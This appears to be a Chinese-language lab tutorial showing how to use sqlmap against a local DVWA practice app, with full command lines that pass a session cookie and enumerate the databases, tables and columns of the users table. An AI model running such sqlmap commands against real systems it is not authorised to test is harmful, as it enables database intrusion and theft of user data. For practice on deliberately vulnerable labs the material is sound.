使用SQLmap对dvwa进行SQL注入测试

SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap

  • 搭建dvwa环境并启动。
  • windows上需要搭建Python环境,下载sqlmap包并解压。。
  • 设置dvwa级别为low(medium,high都可以,不要设成impossible就行)
  • 打开dvwa的SQL Injection,打开浏览器调试,输入user id并submit,查看拦截到的请求。
  • 可以看到是一条GET请求,url是“http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#”,cookie里有”security=low; PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”
    使用SQLmap对dvwa进行SQL注入测试_第1张图片
  • 我们先只用url试试
    使用SQLmap对dvwa进行SQL注入测试_第2张图片
    结果是跳转到登录页面,看来是需要带cookie的 。
  • 这次我们加上cookie

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6”
    使用SQLmap对dvwa进行SQL注入测试_第3张图片
    这次看样子成功了,但是中间会不断需要输入y/n

  • 我们在后面加上参数–batch

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch

  • 使用–dbs获取其所有的数据库

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs
    使用SQLmap对dvwa进行SQL注入测试_第4张图片

  • 使用-D xxx指定查看的数据库,用–tables查看该数据库的所有表

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa --tables
    使用SQLmap对dvwa进行SQL注入测试_第5张图片

  • 使用-D xxx -T ttt指定查看的表,用–columns查看表的列

    python sqlmap.py -u “http://127.0.0.1/vulnerabilities/sqli/?id=12&Submit=Submit#” --cookie=“security=low;PHPSESSID=42uo6ivi8uu4h2tdimla8m6lj6” --batch --dbs -D dvwa -T users --columns
    使用SQLmap对dvwa进行SQL注入测试_第6张图片
    参考文章:https://blog.csdn.net/huilan_same/article/details/68067550

你可能感兴趣的:(Web安全)